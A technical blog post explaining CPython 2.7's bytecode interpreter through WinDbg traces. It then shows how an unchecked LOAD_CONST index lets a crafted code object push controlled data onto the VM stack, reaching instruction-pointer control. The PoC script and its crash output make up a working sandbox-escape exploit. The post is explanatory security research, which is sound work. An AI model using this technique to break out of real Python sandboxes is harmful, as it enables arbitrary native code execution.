Deep Dive Into Python's VM: Story of LOAD_CONST Bug
Introduction
A year ago, I wrote a Python script to leverage a bug in Python’s virtual machine: the idea was to fully control the Python virtual processor and then to instrument the VM to execute native code. The python27_abuse_vm_to_execute_x86_code.py script wasn’t really self-explanatory, so I believe only a few people actually took the time to understand what happened under the hood. The purpose of this post is to explain the bug, how you can control the VM, and how you can turn the bug into something more useful. It’s also a cool occasion to see how the Python virtual machine works from a low-level perspective: what we love so much, right?
But before going further, I would just like to clarify a couple of things:
I didn’t find this bug; it is quite old and known by the Python developers (trading safety for performance), so don’t panic, this is not a 0day or a new bug; it can be a cool CTF trick though
Obviously, YES I know we can also “escape” the virtual machine with the ctypes module; but this is a feature, not a bug. In addition, ctypes is always “removed” from sandbox implementations in Python
Also, keep in mind I will focus on Python 2.7.5 x86 on Windows; but obviously this is adaptable to other systems and architectures, so this is left as an exercise to the interested reader.
All right, let’s move on to the first part: this one will focus on the essentials of the VM and Python objects.
The Python virtual processor
Introduction
As you know, Python is a (really cool) interpreted scripting language, and the source of the official interpreter is available here: Python-2.7.6.tgz. The project is written in C, and it is really readable; so please download the sources and read them, you will learn a lot of things.
Now all the Python code you write is compiled, at some point, into “bytecode”: let’s say it’s exactly the same as when your C code is compiled into x86 code. But the cool thing for us is that the Python architecture is far simpler than x86.
Here is a partial list of all available opcodes in Python 2.7.5:
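If you want to regenerate such a list yourself, a minimal sketch using the standard opcode module could look like this. The helper name list_opcodes is made up for illustration, and the names and numbers printed depend on the interpreter you run it with (they only match 2.7.5 under a 2.7.5 interpreter).

```python
import opcode

def list_opcodes(limit=None):
    """Return (number, name) pairs for the opcodes of the running interpreter."""
    pairs = [(number, name)
             for number, name in enumerate(opcode.opname)
             if not name.startswith('<')]  # '<N>' marks an unassigned slot
    return pairs if limit is None else pairs[:limit]

# Print the first few opcodes known to this interpreter.
for number, name in list_opcodes(limit=8):
    print('%3d (0x%02x) %s' % (number, number, name))
```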
The Python VM is fully implemented in the function PyEval_EvalFrameEx that you can find in the ceval.c file. The machine is built with a simple loop handling opcodes one-by-one with a bunch of switch-cases:
PyObject *
PyEval_EvalFrameEx(PyFrameObject *f, int throwflag)
{
    //...
fast_next_opcode:
    //...
    /* Extract opcode and argument */
    opcode = NEXTOP();
    oparg = 0;
    if (HAS_ARG(opcode))
        oparg = NEXTARG();
    //...
    switch (opcode) {
    case NOP:
        goto fast_next_opcode;

    case LOAD_FAST:
        x = GETLOCAL(oparg);
        if (x != NULL) {
            Py_INCREF(x);
            PUSH(x);
            goto fast_next_opcode;
        }
        format_exc_check_arg(PyExc_UnboundLocalError,
            UNBOUNDLOCAL_ERROR_MSG,
            PyTuple_GetItem(co->co_varnames, oparg));
        break;

    case LOAD_CONST:
        x = GETITEM(consts, oparg);
        Py_INCREF(x);
        PUSH(x);
        goto fast_next_opcode;

    case STORE_FAST:
        v = POP();
        SETLOCAL(oparg, v);
        goto fast_next_opcode;
    //...
}
The machine also uses a virtual stack to pass objects to, and return objects from, the different opcodes. So it really looks like an architecture we are used to dealing with, nothing exotic.
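To make the fetch/dispatch loop and the virtual stack more concrete, here is a toy model of it in Python. It is only a sketch: the function run and its parameters are hypothetical names, the opcode numbers are the Python 2.7 ones (they differ in other versions), and unlike the C code this model is memory-safe because Python checks every index.

```python
# Opcode numbers as defined by Python 2.7; other versions use other values.
BINARY_ADD, RETURN_VALUE = 23, 83
LOAD_CONST, LOAD_FAST, STORE_FAST = 100, 124, 125
HAVE_ARGUMENT = 90

def run(code, consts=(), fastlocals=()):
    """Evaluate a tiny subset of 2.7 bytecode with an explicit stack."""
    code = bytearray(code)
    fastlocals = list(fastlocals)
    stack = []
    pc = 0
    while True:
        opcode = code[pc]                       # NEXTOP()
        pc += 1
        oparg = 0
        if opcode >= HAVE_ARGUMENT:             # HAS_ARG(opcode)
            oparg = code[pc] | (code[pc + 1] << 8)  # NEXTARG(), low byte first
            pc += 2
        if opcode == LOAD_FAST:
            stack.append(fastlocals[oparg])
        elif opcode == LOAD_CONST:
            stack.append(consts[oparg])         # bounds-checked here, unlike GETITEM
        elif opcode == STORE_FAST:
            fastlocals[oparg] = stack.pop()
        elif opcode == BINARY_ADD:
            w = stack.pop()
            v = stack.pop()
            stack.append(v + w)
        elif opcode == RETURN_VALUE:
            return stack.pop()
        else:
            raise ValueError('unsupported opcode %#x' % opcode)

# LOAD_CONST 0; STORE_FAST 0; LOAD_FAST 0; LOAD_CONST 1; BINARY_ADD; RETURN_VALUE
program = b'\x64\x00\x00\x7d\x00\x00\x7c\x00\x00\x64\x01\x00\x17\x53'
print(run(program, consts=(40, 2), fastlocals=(None,)))
```

The real interpreter works on PyObject pointers and reference counts instead of Python values, but the control flow is the same: fetch an opcode, fetch its argument if it has one, then dispatch.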
Everything is an object
The first rule of the VM is that it handles only Python objects. A Python object is basically made of two parts:
The first one is a header, which is mandatory for all objects. It is defined like this:
Python object header
#define PyObject_HEAD                   \
    _PyObject_HEAD_EXTRA                \
    Py_ssize_t ob_refcnt;               \
    struct _typeobject *ob_type;

#define PyObject_VAR_HEAD               \
    PyObject_HEAD                       \
    Py_ssize_t ob_size; /* Number of items in variable part */
The second one is the variable part that describes the specifics of your object. Here is for example PyStringObject:
PyStringObject
typedef struct {
    PyObject_VAR_HEAD
    long ob_shash;
    int ob_sstate;
    char ob_sval[1];

    /* Invariants:
     *     ob_sval contains space for 'ob_size+1' elements.
     *     ob_sval[ob_size] == 0.
     *     ob_shash is the hash of the string or -1 if not computed yet.
     *     ob_sstate != 0 iff the string object is in stringobject.c's
     *       'interned' dictionary; in this case the two references
     *       from 'interned' to this object are *not counted* in ob_refcnt.
     */
} PyStringObject;
Now, some of you may ask yourselves “How does Python know the type of an object when it receives a pointer?”. In fact, this is exactly the role of the ob_type field. Python exports a _typeobject static variable that describes the type of the object. Here is, for instance, PyString_Type:
Basically, every string object has its ob_type field pointing to that PyString_Type variable. With this cute little trick, Python is able to do type checking like this:
With the previous tricks, and the PyObject type defined as follows, Python is able to handle the different objects in a generic fashion:
PyObject
typedef struct _object {
    PyObject_HEAD
} PyObject;
So when you are in your debugger and you want to know what type of object it is, you can use that field to identify easily the type of the object you are dealing with:
Once you have done that, you can dump the variable part describing your object to extract the information you want.
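The same header can also be inspected from Python itself, without a debugger. The sketch below is hypothetical (read_header is not an existing API) and rests on two assumptions: that id() returns the object's address, which is a CPython implementation detail, and that the interpreter is a regular release build where the header starts with ob_refcnt immediately followed by ob_type.

```python
import ctypes

def read_header(obj):
    """Return (ob_refcnt, address stored in ob_type) read from obj's memory."""
    address = id(obj)  # CPython detail: id() is the address of the object
    refcnt = ctypes.c_ssize_t.from_address(address).value
    # ob_type sits right after ob_refcnt in a release build.
    type_address = ctypes.c_void_p.from_address(
        address + ctypes.sizeof(ctypes.c_ssize_t)).value
    return refcnt, type_address

refcnt, type_address = read_header('some string')
print('ob_refcnt = %d' % refcnt)
print('ob_type   = %#x (id(str) = %#x)' % (type_address, id(str)))
```

The value read from ob_type should be the address of the type object, which is exactly what the type-checking macros compare against.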
By the way, all the native objects are implemented in the Objects/ directory.
Debugging session: stepping the VM. The hard way.
It’s time for us to go a little bit deeper, at the assembly level, where we belong ; so let’s define a dummy function like this one:
dummy function
def a(b, c):
    return b + c
Now, using Python’s dis module, we can disassemble the function object a:
disassemble a
In [20]: dis.dis(a)
2 0 LOAD_FAST 0 (b)
3 LOAD_FAST 1 (c)
6 BINARY_ADD
7 RETURN_VALUE
In [21]: a.func_code.co_code
In [22]: print ''.join('\\x%.2x' % ord(i) for i in a.__code__.co_code)
\x7c\x00\x00\x7c\x01\x00\x17\x53
In [23]: opcode.opname[0x7c]
Out[23]: 'LOAD_FAST'
In [24]: opcode.opname[0x17]
Out[24]: 'BINARY_ADD'
In [25]: opcode.opname[0x53]
Out[25]: 'RETURN_VALUE'
Keep in mind, as we said earlier, that everything is an object ; so a function is an object, and bytecode is an object as well:
Time to attach my debugger to the interpreter to see what’s going on in that weird-machine, and to place a conditional breakpoint on PyEval_EvalFrameEx.
Once you have done that, you can call the dummy function:
windbg breakpoint
0:000> bp python27!PyEval_EvalFrameEx+0x2b2 ".if(poi(ecx+4) == 0x53170001){}.else{g}"
breakpoint 0 redefined
0:000> g
eax=025ea914 ebx=00000000 ecx=025ea914 edx=026bef98 esi=1e222c0c edi=02002e38
eip=1e0ec562 esp=0027fcd8 ebp=026bf0d8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601 movzx eax,byte ptr [ecx] ds:002b:025ea914=7c
0:000> db ecx l8
025ea914 7c 00 00 7c 01 00 17 53 |..|...S
OK perfect, we are in the middle of the VM, and our function is being evaluated. The register ECX points to the bytecode being evaluated, and the first opcode is LOAD_FAST.
Basically, this opcode takes an object from the fastlocals array and pushes it onto the virtual stack. In our case, as we saw in both the disassembly and the bytecode dump, we are going to load index 0 (the argument b), then index 1 (the argument c).
Here’s what it looks like in the debugger ; first step is to load the LOAD_FAST opcode:
fetching the LOAD_FAST opcode
0:000>
eax=025ea914 ebx=00000000 ecx=025ea914 edx=026bef98 esi=1e222c0c edi=02002e38
eip=1e0ec562 esp=0027fcd8 ebp=026bf0d8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601 movzx eax,byte ptr [ecx] ds:002b:025ea914=7c
In ECX we have a pointer to the opcodes of the function being evaluated, our dummy function. 0x7c is the value of the LOAD_FAST opcode, as we can see:
LOAD_FAST
#define LOAD_FAST 124 /* Local variable number */
Then, the function needs to check whether the opcode has an argument or not, and that’s done by comparing the opcode with a constant value called HAVE_ARGUMENT:
Checking if the opcode has an argument
0:000>
eax=0000007c ebx=00000000 ecx=025ea915 edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec568 esp=0027fcd8 ebp=026bf0d8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
python27!PyEval_EvalFrameEx+0x2b8:
1e0ec568 83f85a cmp eax,5Ah
Again, we can verify the value to be sure we understand what we are doing:
opcode.HAVE_ARGUMENT
In [11]: '%x' % opcode.HAVE_ARGUMENT
Out[11]: '5a'
HAS_ARG
#define HAS_ARG(op) ((op) >= HAVE_ARGUMENT)
If the opcode has an argument, the function needs to retrieve it (it is encoded on two bytes, which the compiled code reads one byte at a time):
Fetching the argument
0:000>
eax=0000007c ebx=00000000 ecx=025ea915 edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec571 esp=0027fcd8 ebp=026bf0d8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
python27!PyEval_EvalFrameEx+0x2c1:
1e0ec571 0fb67901 movzx edi,byte ptr [ecx+1] ds:002b:025ea916=00
As expected for the first LOAD_FAST the argument is 0x00, perfect.
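The fetch steps traced so far (read the opcode, compare it with HAVE_ARGUMENT, read the argument) can be replayed offline. The following is a minimal sketch, not the interpreter's code: trace_fetches is a hypothetical helper, the bytecode and the base address 0x025ea914 are taken from the debugging session of this post, and the encoding assumed is the Python 2.7 one (one opcode byte, optionally followed by a two-byte little-endian argument).

```python
HAVE_ARGUMENT = 0x5a  # the constant used by the "cmp eax,5Ah" instruction

def trace_fetches(code, base):
    """Return (address, opcode, oparg) for every instruction in code."""
    code = bytearray(code)
    pc = 0
    fetches = []
    while pc < len(code):
        address = base + pc          # where the opcode byte is read from
        opcode = code[pc]
        pc += 1
        oparg = None
        if opcode >= HAVE_ARGUMENT:  # HAS_ARG(opcode)
            # Two-byte argument, low byte first.
            oparg = code[pc] | (code[pc + 1] << 8)
            pc += 2
        fetches.append((address, opcode, oparg))
    return fetches

bytecode = b'\x7c\x00\x00\x7c\x01\x00\x17\x53'
for address, opcode, oparg in trace_fetches(bytecode, 0x025ea914):
    print('%08x  opcode=%#04x  oparg=%s' % (address, opcode, oparg))
```

The addresses it computes for the last two opcodes, 025ea91a and 025ea91b, are the ones the debugger shows when BINARY_ADD (0x17) and RETURN_VALUE (0x53) are fetched.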
After that, the function dispatches the execution flow to the LOAD_FAST case, defined as follows:
0:000>
eax=0000007c ebx=00000000 ecx=025ea91a edx=026bef98 esi=025eafc0 edi=00000001
eip=1e0ec562 esp=0027fcd8 ebp=026bf0e0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601 movzx eax,byte ptr [ecx] ds:002b:025ea91a=17
Here it’s supposed to retrieve the two objects on the top-of-stack, and add them.
The C code looks like this:
BINARY_ADD
#define SET_TOP(v) (stack_pointer[-1] = (v))

case BINARY_ADD:
    w = POP();
    v = TOP();
    if (PyInt_CheckExact(v) && PyInt_CheckExact(w)) {
        // Not our case
    }
    else if (PyString_CheckExact(v) &&
             PyString_CheckExact(w)) {
        x = string_concatenate(v, w, f, next_instr);
        /* string_concatenate consumed the ref to v */
        goto skip_decref_vx;
    }
    else {
        // Not our case
    }
    Py_DECREF(v);
skip_decref_vx:
    Py_DECREF(w);
    SET_TOP(x);
    if (x != NULL) continue;
    break;
And here is the assembly version where it retrieves the two objects from the top-of-stack:
POP and TOP
0:000>
eax=00000017 ebx=00000000 ecx=00000016 edx=0000000f esi=025eafc0 edi=00000000
eip=1e0eccf5 esp=0027fcd8 ebp=026bf0e0 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200287
python27!PyEval_EvalFrameEx+0xa45:
1e0eccf5 8b75f8 mov esi,dword ptr [ebp-8] ss:002b:026bf0d8=a0aa5e02
...
0:000>
eax=1e226798 ebx=00000000 ecx=00000016 edx=0000000f esi=025eaaa0 edi=00000000
eip=1e0eccfb esp=0027fcd8 ebp=026bf0e0 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200287
python27!PyEval_EvalFrameEx+0xa4b:
1e0eccfb 8b7dfc mov edi,dword ptr [ebp-4] ss:002b:026bf0dc=c0af5e02
0:000>
eax=1e226798 ebx=00000000 ecx=00000016 edx=0000000f esi=025eaaa0 edi=025eafc0
eip=1e0eccfe esp=0027fcd8 ebp=026bf0e0 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200287
python27!PyEval_EvalFrameEx+0xa4e:
1e0eccfe 83ed04 sub ebp,4
And the last part of the case is to push the resulting string onto the virtual stack (SET_TOP operation):
Push the resulting object onto the virtual stack
0:000>
eax=025eaac0 ebx=025eaac0 ecx=00000005 edx=000004fb esi=025eaaa0 edi=025eafc0
eip=1e0ecb82 esp=0027fcd8 ebp=026bf0dc iopl=0 nv up ei pl nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200213
python27!PyEval_EvalFrameEx+0x8d2:
1e0ecb82 895dfc mov dword ptr [ebp-4],ebx ss:002b:026bf0d8=a0aa5e02
Last part of our deep dive, the RETURN_VALUE opcode:
Fetching the RETURN_VALUE opcode
0:000>
eax=025eaac0 ebx=025eafc0 ecx=025ea91b edx=026bef98 esi=025eaac0 edi=025eafc0
eip=1e0ec562 esp=0027fcd8 ebp=026bf0dc iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601 movzx eax,byte ptr [ecx] ds:002b:025ea91b=53
All right, at least now you have a more precise idea about how that Python virtual machine works, and more importantly how you can directly debug it without symbols. Of course, you can download the debug symbols on Linux and use that information in gdb ; it should make your life easier (….but I hate gdb man…).
Note that I would very much love to have a debugger at the Python bytecode level; it would be much easier than instrumenting the interpreter. If you know of one, ping me! If you build one, ping me too :-).
This may be a bit obscure for you, but keep in mind we control the index oparg and the content of consts. That means we can just push untrusted data on the virtual stack of the VM: brilliant. Getting a crash out of this bug is fairly easy, try to run these lines (on a Python 2.7 distribution):
(2058.2108): Access violation - code c0000005 (!!! second chance !!!)
[...]
eax=01cb1030 ebx=00000000 ecx=00000063 edx=00000046 esi=1e222c0c edi=beefdead
eip=1e0ec5f7 esp=0027e7f8 ebp=0273a9f0 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010287
python27!PyEval_EvalFrameEx+0x347:
1e0ec5f7 8b74b80c mov esi,dword ptr [eax+edi*4+0Ch] ds:002b:fd8a8af0=????????
By the way, some readers might have caught the same type of bug in LOAD_FAST with the fastlocals array ; those readers are definitely right :).
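The faulting address in the register dump above can be recomputed by hand, which confirms that oparg is used as an index without any bounds check. This is a small sketch of that arithmetic only: load_const_address is a hypothetical helper, and the constants assume the 32-bit build discussed in this post (4-byte pointers, tuple items starting 0xC bytes into the tuple object).

```python
MASK32 = 0xffffffff
POINTER_SIZE = 4      # 32-bit build
OB_ITEM_OFFSET = 0xC  # ob_refcnt + ob_type + ob_size precede the items

def load_const_address(consts_address, oparg):
    """Address read by 'mov esi,dword ptr [eax+edi*4+0Ch]' (eax=consts, edi=oparg)."""
    return (consts_address + oparg * POINTER_SIZE + OB_ITEM_OFFSET) & MASK32

# eax and edi as shown in the crash dump.
print('%#.8x' % load_const_address(0x01cb1030, 0xbeefdead))
```

With eax=01cb1030 and edi=beefdead this gives fd8a8af0, the unmapped address the debugger reports.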
Walking through the PoC
OK, so if you look only at the faulting instruction, you could say that the bug is minor and that we won’t be able to turn it into something “useful”. But the essential piece when you want to exploit a piece of software is to completely understand how it works. Then you are more capable of turning bugs that seem useless into interesting primitives.
As we said several times, from Python code you can’t really push any value you want onto the Python virtual stack, obviously. The machine is only dealing with Python objects. However, with this bug we can corrupt the virtual stack by pushing arbitrary data that we control. If you do that well, you can end up causing the Python VM to call whatever address you want. That’s exactly what I did back when I wrote python27_abuse_vm_to_execute_x86_code.py.
In Python we are really lucky because we can control a lot of things in memory, and we natively have a way to “leak” (I shouldn’t call that a leak though, because it’s a feature) the address of a Python object with the function id. So basically we can do stuff, we can do it reliably, and we can manage not to break the interpreter, like bosses.
Pushing attacker-controlled data on the virtual stack
We control oparg and the content of the tuple consts. We can also find out the address of that tuple. So we can have a Python string object that stores an arbitrary value, let’s say 0xdeadbeef and it will be pushed on the virtual stack.
import opcode
import types
import struct

def pshort(s):
    return struct.pack('<H', s)

def a():
    pass

consts = ()
s = '\xef\xbe\xad\xde'
address_s = id(s) + 20 # 20 is the offset of the array of byte we control in the string
address_consts = id(consts)
# python27!PyEval_EvalFrameEx+0x347:
# 1e0ec5f7 8b74b80c mov esi,dword ptr [eax+edi*4+0Ch] ds:002b:fd8a8af0=????????
offset = ((address_s - address_consts - 0xC) / 4) & 0xffffffff
high = offset >> 16
low = offset & 0xffff
print 'Consts tuple @%#.8x' % address_consts
print 'Address of controled data @%#.8x' % address_s
print 'Offset between const and our object: @%#.8x' % offset
print 'Going to push [%#.8x] on the virtual stack' % (address_consts + (address_s - address_consts - 0xC) + 0xc)

a.func_code = types.CodeType(
    0, 0, 0, 0,
    chr(opcode.opmap['EXTENDED_ARG']) + pshort(high) +
    chr(opcode.opmap['LOAD_CONST']) + pshort(low),
    consts, (), (), '', '', 0, ''
)
a()
..annnnd..
debugger view
D:\>python 1.py
Consts tuple @0x01db1030
Address of controled data @0x022a0654
Offset between const and our object: @0x0013bd86
Going to push [0x022a0654] on the virtual stack
*JIT debugger pops*
eax=01db1030 ebx=00000000 ecx=00000063 edx=00000046 esi=deadbeef edi=0013bd86
eip=1e0ec5fb esp=0027fc68 ebp=01e63fc0 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010287
python27!PyEval_EvalFrameEx+0x34b:
1e0ec5fb ff06 inc dword ptr [esi] ds:002b:deadbeef=????????
0:000> ub eip l1
python27!PyEval_EvalFrameEx+0x347:
1e0ec5f7 8b74b80c mov esi,dword ptr [eax+edi*4+0Ch]
0:000> ? eax+edi*4+c
Evaluate expression: 36308564 = 022a0654
0:000> dd 022a0654 l1
022a0654 deadbeef <- the data we control in our PyStringObject
0:000> dps 022a0654-0n20 l2
022a0640 00000003
022a0644 1e226798 python27!PyString_Type
Perfect, we control a part of the virtual stack :).
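The numbers printed by that run can be double-checked offline. The sketch below recomputes the index from the two addresses and shows how it is split between EXTENDED_ARG and LOAD_CONST. The helper names index_for and encode_load are made up for illustration, the opcode numbers are hardcoded to their Python 2.7 values rather than read from the opcode module, and the layout assumptions are the 32-bit ones used throughout the post.

```python
import struct

EXTENDED_ARG, LOAD_CONST = 145, 100  # Python 2.7 opcode numbers

def index_for(target_address, consts_address):
    """Index that makes consts[index] read the dword at target_address."""
    return ((target_address - consts_address - 0xC) // 4) & 0xffffffff

def encode_load(index):
    """EXTENDED_ARG carries the high 16 bits, LOAD_CONST the low 16 bits."""
    high, low = index >> 16, index & 0xffff
    return (struct.pack('<BH', EXTENDED_ARG, high) +
            struct.pack('<BH', LOAD_CONST, low))

# Addresses printed by the run: controlled data and consts tuple.
index = index_for(0x022a0654, 0x01db1030)
print('%#.8x' % index)
print(' '.join('%02x' % byte for byte in bytearray(encode_load(index))))
```

The computed index, 0x0013bd86, is the value found in EDI when the debugger breaks, and the six bytes produced are the whole body of the crafted code object.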
Game over, CALL_FUNCTION
Once you control the virtual stack, the only limit is your imagination and your ability to find an interesting spot in the virtual machine. My idea was to craft a PyFunctionObject somehow, push it onto the virtual stack, and then use the CALL_FUNCTION opcode on it.
PyFunctionObject definition
typedef struct {
    PyObject_HEAD
    PyObject *func_code;        /* A code object */
    PyObject *func_globals;     /* A dictionary (other mappings won't do) */
    PyObject *func_defaults;    /* NULL or a tuple */
    PyObject *func_closure;     /* NULL or a tuple of cell objects */
    PyObject *func_doc;         /* The __doc__ attribute, can be anything */
    PyObject *func_name;        /* The __name__ attribute, a string object */
    PyObject *func_dict;        /* The __dict__ attribute, a dict or NULL */
    PyObject *func_weakreflist; /* List of weak references */
    PyObject *func_module;      /* The __module__ attribute, can be anything */
} PyFunctionObject;
The thing is, as we saw earlier, the virtual machine usually checks the type of the objects it handles. If the type check fails, the function bails out and we are not happy, at all. It means we would need an information leak to obtain a pointer to the PyFunction_Type static variable.
Fortunately for us, CALL_FUNCTION can still be abused without knowing the magic pointer needed to craft our object correctly. Let’s go over the source code to illustrate my point:
(11d0.11cc): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Python\Python275\python27.dll -
eax=01cc1030 ebx=00000000 ecx=00422e78 edx=00000000 esi=deadbeef edi=02e62df4
eip=deadbeef esp=0027e78c ebp=02e62df4 iopl=0 nv up ei ng nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283
deadbeef ?? ???
After reading this little post, you are now aware that if you want to sandbox Python effectively, you should do it outside of Python and not by preventing the use of some modules or things like that: this is broken by design. The virtual machine is not safe enough to build a strong sandbox inside Python, so don’t rely on such a thing if you don’t want to get surprised. An article about that exact same thing was written here if you are interested: The failure of pysandbox.
You also may want to look at PyPy’s sandboxing capability if you are interested in executing untrusted Python code. Otherwise, you can build your own SECCOMP-based system :).
On the other hand, I had a lot of fun taking a deep dive into Python’s source code and I hope you had some too! If you would like to know more about the low-level aspects of Python, here is a list of interesting posts: